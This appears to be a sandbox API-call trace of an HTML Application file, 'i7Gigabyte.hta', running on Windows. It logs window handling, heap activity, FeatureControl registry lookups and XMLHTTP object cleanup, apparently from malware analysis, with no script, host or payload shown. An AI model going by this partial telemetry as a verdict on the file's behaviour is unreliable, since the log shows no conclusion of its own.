[0091.292] IUnknown:AddRef (This=0x13c184) returned 0x4
[0091.292] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pszPath=0x39eb30, pcchPath=0x39eb10, dwFlags=0x0 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", pcchPath=0x39eb10) returned 0x0
[0091.292] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x5c) returned 0x151098
[0091.292] IUnknown:Release (This=0x13c184) returned 0x3
[0091.292] GetWindowTextW (in: hWnd=0x20314, lpString=0x39e6a8, nMaxCount=512 | out: lpString="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 43
[0091.292] NtdllDefWindowProc_W () returned 0x2b
[0091.292] IUnknown:Release (This=0x13c184) returned 0x2
[0091.292] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151098 | out: hHeap=0x110000) returned 1
[0091.292] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0091.292] SendMessageW (hWnd=0x20312, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0091.292] NtdllDefWindowProc_W () returned 0x0
[0091.297] NtdllDefWindowProc_W () returned 0x0
[0091.298] NtdllDefWindowProc_W () returned 0x0
[0091.298] SendMessageW (hWnd=0x20314, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0091.298] NtdllDefWindowProc_W () returned 0x0
[0091.298] SetWindowLongW (hWnd=0x20314, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0091.298] NtdllDefWindowProc_W () returned 0x0
[0091.298] NtdllDefWindowProc_W () returned 0x0
[0091.320] NtdllDefWindowProc_W () returned 0x10027
[0091.320] SetWindowLongW (hWnd=0x20314, nIndex=-20, dwNewLong=262144) returned 262400
[0091.320] NtdllDefWindowProc_W () returned 0x0
[0091.320] NtdllDefWindowProc_W () returned 0x0
[0091.321] SetWindowPos (hWnd=0x20314, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0091.321] NtdllDefWindowProc_W () returned 0x0
[0091.321] NtdllDefWindowProc_W () returned 0x0
[0091.326] NtdllDefWindowProc_W () returned 0x0
[0091.326] GlobalAddAtomW (lpString=0x0) returned 0x0
[0091.326] SetPropW (hWnd=0x20312, lpString=0x0, hData=0x20312) returned 0
[0091.326] SetWindowPos (hWnd=0x20314, hWndInsertAfter=0x0, X=-101, Y=-102, cx=0, cy=0, uFlags=0x15) returned 1
[0091.326] NtdllDefWindowProc_W () returned 0x0
[0091.331] NtdllDefWindowProc_W () returned 0x0
[0091.331] NtdllDefWindowProc_W () returned 0x0
[0091.332] ShowWindow (hWnd=0x20314, nCmdShow=10) returned 0
[0091.332] NtdllDefWindowProc_W () returned 0x0
[0091.332] NtdllDefWindowProc_W () returned 0x0
[0091.332] NtdllDefWindowProc_W () returned 0x0
[0091.351] NtdllDefWindowProc_W () returned 0x0
[0091.353] NtdllDefWindowProc_W () returned 0x1
[0091.354] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.354] GetCurrentThreadId () returned 0xe84
[0091.354] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.354] WindowFromDC (hDC=0x2a010b9a) returned 0x1034a
[0091.354] GetDeviceCaps (hdc=0x5b0108ae, index=38) returned 32409
[0091.354] IntersectRect (in: lprcDst=0x39f254, lprcSrc1=0x121c0c, lprcSrc2=0x121bfc | out: lprcDst=0x39f254) returned 1
[0091.354] IntersectRect (in: lprcDst=0x39f244, lprcSrc1=0x39f244, lprcSrc2=0x39f150 | out: lprcDst=0x39f244) returned 0
[0091.354] IsRectEmpty (lprc=0x39f244) returned 1
[0091.354] GetClipBox (in: hdc=0x2a010b9a, lprect=0x39f244 | out: lprect=0x39f244) returned 1
[0091.354] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x50) returned 0x14dec8
[0091.354] GetViewportOrgEx (in: hdc=0x2a010b9a, lppoint=0x39f178 | out: lppoint=0x39f178) returned 1
[0091.354] SetViewportOrgEx (in: hdc=0x2a010b9a, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1
[0091.354] GetCurrentThreadId () returned 0xe84
[0091.354] GetCurrentThreadId () returned 0xe84
[0091.355] NtdllDefWindowProc_W () returned 0x0
[0091.355] GetClientRect (in: hWnd=0x20314, lpRect=0x39f390 | out: lpRect=0x39f390) returned 1
[0091.355] GetClientRect (in: hWnd=0x20314, lpRect=0x39f390 | out: lpRect=0x39f390) returned 1
[0091.355] NtdllDefWindowProc_W () returned 0x0
[0091.355] UpdateWindow (hWnd=0x20314) returned 1
[0091.355] NtdllDefWindowProc_W () returned 0x0
[0091.355] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.355] MapWindowPoints (in: hWndFrom=0x1034a, hWndTo=0x0, lpPoints=0x39edac, cPoints=0x1 | out: lpPoints=0x39edac) returned -4653149
[0091.355] BeginPaint (in: hWnd=0x1034a, lpPaint=0x39f1e0 | out: lpPaint=0x39f1e0) returned 0x39010bb8
[0091.355] IsRectEmpty (lprc=0x39f1e8) returned 1
[0091.355] EndPaint (hWnd=0x1034a, lpPaint=0x39f1e0) returned 1
[0091.355] MapWindowPoints (in: hWndFrom=0x1034a, hWndTo=0x0, lpPoints=0x39ed9c, cPoints=0x1 | out: lpPoints=0x39ed9c) returned -4653149
[0091.355] GetCurrentThreadId () returned 0xe84
[0091.355] GetCurrentThreadId () returned 0xe84
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.356] GetCurrentThreadId () returned 0xe84
[0091.356] GetCurrentThreadId () returned 0xe84
[0091.356] GetCurrentThreadId () returned 0xe84
[0091.356] GetCurrentThreadId () returned 0xe84
[0091.356] GetCurrentThreadId () returned 0xe84
[0091.356] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f3e0 | out: lpPoint=0x39f3e0) returned 1
[0091.357] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.357] GetCurrentThreadId () returned 0xe84
[0091.357] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.357] GetFocus () returned 0x1034a
[0091.358] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x50) returned 0x14e658
[0091.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.358] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f410 | out: lpPoint=0x39f410) returned 1
[0091.358] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.358] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f3f8 | out: lpPoint=0x39f3f8) returned 1
[0091.359] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.359] GetCurrentThreadId () returned 0xe84
[0091.359] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.359] IsWinEventHookInstalled (event=0x8005) returned 0
[0091.359] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned -5
[0091.359] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned -5
[0091.359] GetCurrentThreadId () returned 0xe84
[0091.359] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f8f8 | out: lpPoint=0x39f8f8) returned 1
[0091.360] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.360] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.360] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f8d8 | out: lpPoint=0x39f8d8) returned 1
[0091.360] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.360] GetCurrentThreadId () returned 0xe84
[0091.361] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.361] IsWinEventHookInstalled (event=0x8005) returned 0
[0091.361] GetCurrentThreadId () returned 0xe84
[0091.361] GetMessageW (in: lpMsg=0x39fc0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x39fc0c) returned 1
[0091.361] NtdllDefWindowProc_W () returned 0x10027
[0091.374] NtdllDefWindowProc_W () returned 0x1700c1
[0091.374] NtdllDefWindowProc_W () returned 0x0
[0091.374] TranslateMessage (lpMsg=0x39fc0c) returned 0
[0091.374] DispatchMessageW (lpMsg=0x39fc0c) returned 0x0
[0091.374] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f508 | out: lpPoint=0x39f508) returned 1
[0091.374] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.375] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.375] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f398 | out: lpPoint=0x39f398) returned 1
[0091.375] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.375] GetCurrentThreadId () returned 0xe84
[0091.376] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.376] DestroyWindow (hWnd=0x20314) returned 1
[0091.376] NtdllDefWindowProc_W () returned 0x0
[0091.376] NtdllDefWindowProc_W () returned 0x0
[0091.385] NtdllDefWindowProc_W () returned 0x0
[0091.385] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.385] GetMessageTime () returned 21239816
[0091.385] GetMessagePos () returned 0x1f403f3
[0091.386] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x39f3ac | out: plResult=0x39f3ac) returned 0x0
[0091.386] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.386] GetMessageTime () returned 21239816
[0091.386] GetMessagePos () returned 0x1f403f3
[0091.386] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x39eddc | out: plResult=0x39eddc) returned 0x0
[0091.386] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1cc508 | out: hHeap=0x110000) returned 1
[0091.386] SetTimer (hWnd=0x1034a, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0091.386] GetCurrentThreadId () returned 0xe84
[0091.386] GetCurrentThreadId () returned 0xe84
[0091.386] PostQuitMessage (nExitCode=0)
[0091.386] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.386] RevokeDragDrop (hwnd=0x1034a) returned 0x0
[0091.386] GetCurrentThreadId () returned 0xe84
[0091.387] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0091.387] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x39f920 | out: plResult=0x39f920) returned 0x1
[0091.387] NtdllDefWindowProc_W () returned 0x0
[0091.387] GetCurrentThreadId () returned 0xe84
[0091.387] SetWindowLongW (hWnd=0x1034a, nIndex=-21, dwNewLong=0) returned 1317520
[0091.387] NtdllDefWindowProc_W () returned 0x0
[0091.387] GetMessageW (in: lpMsg=0x39fc0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x39fc0c) returned 0
[0091.399] PostMessageW (hWnd=0x20320, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0091.399] GetCurrentThreadId () returned 0xe84
[0091.399] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.399] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.400] ScreenToClient (in: hWnd=0x0, lpPoint=0x39f9b8 | out: lpPoint=0x39f9b8) returned 0
[0091.400] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.400] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.400] ScreenToClient (in: hWnd=0x0, lpPoint=0x39f9a0 | out: lpPoint=0x39f9a0) returned 0
[0091.401] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0091.401] GetCurrentThreadId () returned 0xe84
[0091.401] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d940 | out: hHeap=0x110000) returned 1
[0091.401] IsWinEventHookInstalled (event=0x8005) returned 0
[0091.402] GetCurrentThreadId () returned 0xe84
[0091.402] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x144f30) returned 0x0
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x121bd0 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ea60 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12da20 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x162558 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.402] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.402] IntersectRect (in: lprcDst=0x39fa20, lprcSrc1=0x39fa20, lprcSrc2=0x39faa8 | out: lprcDst=0x39fa20) returned 1
[0091.402] IntersectRect (in: lprcDst=0x39fab8, lprcSrc1=0x39fab8, lprcSrc2=0x39fa20 | out: lprcDst=0x39fab8) returned 1
[0091.402] IntersectRect (in: lprcDst=0x39fb10, lprcSrc1=0x39fb10, lprcSrc2=0x39faa8 | out: lprcDst=0x39fb10) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x162300 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x162cc8 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.403] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x162e20 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14dec8 | out: hHeap=0x110000) returned 1
[0091.404] GetCurrentThreadId () returned 0xe84
[0091.404] GetCurrentThreadId () returned 0xe84
[0091.404] GetCurrentThreadId () returned 0xe84
[0091.404] GetCurrentThreadId () returned 0xe84
[0091.404] GetCurrentThreadId () returned 0xe84
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166f40 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a4d0 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17eb38 | out: hHeap=0x110000) returned 1
[0091.404] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1c5ce8 | out: hHeap=0x110000) returned 1
[0091.405] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166f08 | out: hHeap=0x110000) returned 1
[0091.405] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.405] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133b78 | out: hHeap=0x110000) returned 1
[0091.405] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14de70 | out: hHeap=0x110000) returned 1
[0091.405] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39fb2c | out: phkResult=0x39fb2c*=0x414) returned 0x0
[0091.405] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39fb30 | out: phkResult=0x39fb30*=0x48c) returned 0x0
[0091.406] RegOpenKeyExW (in: hKey=0x48c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x39faec | out: phkResult=0x39faec*=0x0) returned 0x2
[0091.406] RegOpenKeyExW (in: hKey=0x414, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x39faec | out: phkResult=0x39faec*=0x0) returned 0x2
[0091.406] RegCloseKey (hKey=0x0) returned 0x6
[0091.406] RegCloseKey (hKey=0x0) returned 0x6
[0091.406] RegCloseKey (hKey=0x414) returned 0x0
[0091.406] RegCloseKey (hKey=0x48c) returned 0x0
[0091.406] GetCurrentThreadId () returned 0xe84
[0091.406] GetCurrentThreadId () returned 0xe84
[0091.406] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.407] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17eaa8 | out: hHeap=0x110000) returned 1
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] IUnknown:Release (This=0x174750) returned 0x1
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] GetCurrentThreadId () returned 0xe84
[0091.407] ??3@YAXPAX@Z () returned 0x1
[0091.407] IUnknown:Release (This=0x1525d8) returned 0xe
[0091.407] IUnknown:Release (This=0x1525d8) returned 0xd
[0091.407] IUnknown:Release (This=0x1525d8) returned 0xc
[0091.407] IUnknown:Release (This=0x1525d8) returned 0xb
[0091.408] free (_Block=0x29cb290)
[0091.408] free (_Block=0x29bc7b8)
[0091.408] free (_Block=0x29cc038)
[0091.408] ??3@YAXPAX@Z () returned 0x1
[0091.408] ??3@YAXPAX@Z () returned 0x1
[0091.420] ISystemDebugEventFire:EndSession (This=0x174750) returned 0x0
[0091.420] IUnknown:Release (This=0x174750) returned 0x0
[0091.420] GetUserDefaultLCID () returned 0x409
[0091.420] GetACP () returned 0x4e4
[0091.420] ??3@YAXPAX@Z () returned 0x1
[0091.420] ??3@YAXPAX@Z () returned 0x1
[0091.421] ??3@YAXPAX@Z () returned 0x1
[0091.421] ??3@YAXPAX@Z () returned 0x1
[0091.421] ??3@YAXPAX@Z () returned 0x1
[0091.421] ??3@YAXPAX@Z () returned 0xe0001
[0091.421] ??3@YAXPAX@Z () returned 0x1
[0091.421] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.421] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0091.421] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x165a68 | out: hHeap=0x110000) returned 1
[0091.421] IUnknown:Release (This=0x1742d0) returned 0x1
[0091.421] GetCurrentThreadId () returned 0xe84
[0091.422] GetCurrentThreadId () returned 0xe84
[0091.422] GetCurrentThreadId () returned 0xe84
[0091.422] ??3@YAXPAX@Z () returned 0x1
[0091.422] ??3@YAXPAX@Z () returned 0x1
[0091.422] ??3@YAXPAX@Z () returned 0x1
[0091.422] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39fb20 | out: ppv=0x39fb20*=0x1369d0) returned 0x0
[0091.422] ??3@YAXPAX@Z () returned 0x1
[0091.423] IUnknown:Release (This=0x1b71a8) returned 0x0
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] ??3@YAXPAX@Z () returned 0x1
[0091.425] XMLHTTP:IUnknown:Release (This=0x29c9f38) returned 0x0
[0091.426] ??3@YAXPAX@Z () returned 0x80001
[0091.426] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x1
[0091.426] IUnknown:Release (This=0x152c68) returned 0x0
[0091.426] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x0
[0091.426] ??3@YAXPAX@Z () returned 0x50001
[0091.426] IUnknown:Release (This=0x152c08) returned 0x0
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.429] ??3@YAXPAX@Z () returned 0x1
[0091.430] ??3@YAXPAX@Z () returned 0x1
[0091.430] ??3@YAXPAX@Z () returned 0x1
[0091.432] ??3@YAXPAX@Z () returned 0x5ff901
[0091.432] ??3@YAXPAX@Z () returned 0x5e0001
[0091.432] ??3@YAXPAX@Z () returned 0x5a0001
[0091.432] ??3@YAXPAX@Z () returned 0x560001
[0091.433] ??3@YAXPAX@Z () returned 0x520001
[0091.433] ??3@YAXPAX@Z () returned 0x4e0001
[0091.433] ??3@YAXPAX@Z () returned 0x4a0001
[0091.433] ??3@YAXPAX@Z () returned 0x460001
[0091.433] ??3@YAXPAX@Z () returned 0x420001
[0091.433] ??3@YAXPAX@Z () returned 0x3e0001
[0091.433] ??3@YAXPAX@Z () returned 0x3a0001
[0091.433] ??3@YAXPAX@Z () returned 0x360001
[0091.433] ??3@YAXPAX@Z () returned 0x320001
[0091.433] ??3@YAXPAX@Z () returned 0x2e0001
[0091.433] ??3@YAXPAX@Z () returned 0x2a0001
[0091.434] ??3@YAXPAX@Z () returned 0x260001
[0091.434] ??3@YAXPAX@Z () returned 0x220001
[0091.434] ??3@YAXPAX@Z () returned 0x1e0001
[0091.434] ??3@YAXPAX@Z () returned 0x1a0001
[0091.434] ??3@YAXPAX@Z () returned 0x160001
[0091.434] ??3@YAXPAX@Z () returned 0x120001
[0091.434] ??3@YAXPAX@Z () returned 0xe0001
[0091.434] ??3@YAXPAX@Z () returned 0xa0001
[0091.435] ??3@YAXPAX@Z () returned 0x60001
[0091.435] ??3@YAXPAX@Z () returned 0x5ff801
[0091.435] ??3@YAXPAX@Z () returned 0xfa0001
[0091.435] ??3@YAXPAX@Z () returned 0xf60001
[0091.435] ??3@YAXPAX@Z () returned 0xf20001
[0091.435] ??3@YAXPAX@Z () returned 0xee0001
[0091.435] ??3@YAXPAX@Z () returned 0xea0001
[0091.435] ??3@YAXPAX@Z () returned 0xe60001
[0091.435] ??3@YAXPAX@Z () returned 0xe20001
[0091.435] ??3@YAXPAX@Z () returned 0xde0001
[0091.435] ??3@YAXPAX@Z () returned 0xda0001
[0091.436] ??3@YAXPAX@Z () returned 0xd60001
[0091.436] ??3@YAXPAX@Z () returned 0xd20001
[0091.436] ??3@YAXPAX@Z () returned 0xce0001
[0091.436] ??3@YAXPAX@Z () returned 0xca0001
[0091.436] ??3@YAXPAX@Z () returned 0xc60001
[0091.436] ??3@YAXPAX@Z () returned 0xc20001
[0091.436] ??3@YAXPAX@Z () returned 0xbe0001
[0091.436] ??3@YAXPAX@Z () returned 0xba0001
[0091.436] ??3@YAXPAX@Z () returned 0xb60001
[0091.436] ??3@YAXPAX@Z () returned 0xb20001
[0091.436] ??3@YAXPAX@Z () returned 0xae0001
[0091.436] ??3@YAXPAX@Z () returned 0xaa0001
[0091.437] ??3@YAXPAX@Z () returned 0xa60001
[0091.437] ??3@YAXPAX@Z () returned 0xa20001
[0091.437] ??3@YAXPAX@Z () returned 0x9e0001
[0091.437] ??3@YAXPAX@Z () returned 0x9a0001
[0091.437] ??3@YAXPAX@Z () returned 0x960001
[0091.437] ??3@YAXPAX@Z () returned 0x920001
[0091.437] ??3@YAXPAX@Z () returned 0x8e0001
[0091.437] ??3@YAXPAX@Z () returned 0x8a0001
[0091.437] ??3@YAXPAX@Z () returned 0x860001
[0091.437] ??3@YAXPAX@Z () returned 0x1
[0091.437] ??3@YAXPAX@Z () returned 0x1
[0091.437] ??3@YAXPAX@Z () returned 0x820001
[0091.437] ??3@YAXPAX@Z () returned 0x7e0001
[0091.437] ??3@YAXPAX@Z () returned 0x7a0001
[0091.438] ??3@YAXPAX@Z () returned 0x120001
[0091.438] ??3@YAXPAX@Z () returned 0x760001
[0091.438] ??3@YAXPAX@Z () returned 0x720001
[0091.438] ??3@YAXPAX@Z () returned 0x6e0001
[0091.438] ??3@YAXPAX@Z () returned 0x20001
[0091.438] ??3@YAXPAX@Z () returned 0x6a0001
[0091.438] ??3@YAXPAX@Z () returned 0x660001
[0091.438] ??3@YAXPAX@Z () returned 0x620001
[0091.438] ??3@YAXPAX@Z () returned 0xfa0001
[0091.438] ??3@YAXPAX@Z () returned 0x5e0001
[0091.438] ??3@YAXPAX@Z () returned 0x5a0001
[0091.438] ??3@YAXPAX@Z () returned 0x560001
[0091.438] ??3@YAXPAX@Z () returned 0xf60001
[0091.438] ??3@YAXPAX@Z () returned 0xf20001
[0091.438] ??3@YAXPAX@Z () returned 0x520001
[0091.438] ??3@YAXPAX@Z () returned 0x4e0001
[0091.438] ??3@YAXPAX@Z () returned 0x4a0001
[0091.438] ??3@YAXPAX@Z () returned 0x460001
[0091.438] ??3@YAXPAX@Z () returned 0x420001
[0091.438] ??3@YAXPAX@Z () returned 0x3e0001
[0091.438] ??3@YAXPAX@Z () returned 0xee0001
[0091.438] ??3@YAXPAX@Z () returned 0xea0001
[0091.438] ??3@YAXPAX@Z () returned 0x3a0001
[0091.438] ??3@YAXPAX@Z () returned 0x360001
[0091.439] ??3@YAXPAX@Z () returned 0x320001
[0091.439] ??3@YAXPAX@Z () returned 0xe60001
[0091.439] ??3@YAXPAX@Z () returned 0x2e0001
[0091.439] ??3@YAXPAX@Z () returned 0x2a0001
[0091.439] ??3@YAXPAX@Z () returned 0x260001
[0091.439] ??3@YAXPAX@Z () returned 0xe20001
[0091.439] ??3@YAXPAX@Z () returned 0x220001
[0091.439] ??3@YAXPAX@Z () returned 0x1e0001
[0091.439] ??3@YAXPAX@Z () returned 0x1a0001
[0091.439] ??3@YAXPAX@Z () returned 0xde0001
[0091.439] ??3@YAXPAX@Z () returned 0xda0001
[0091.439] ??3@YAXPAX@Z () returned 0x160001
[0091.439] ??3@YAXPAX@Z () returned 0x120001
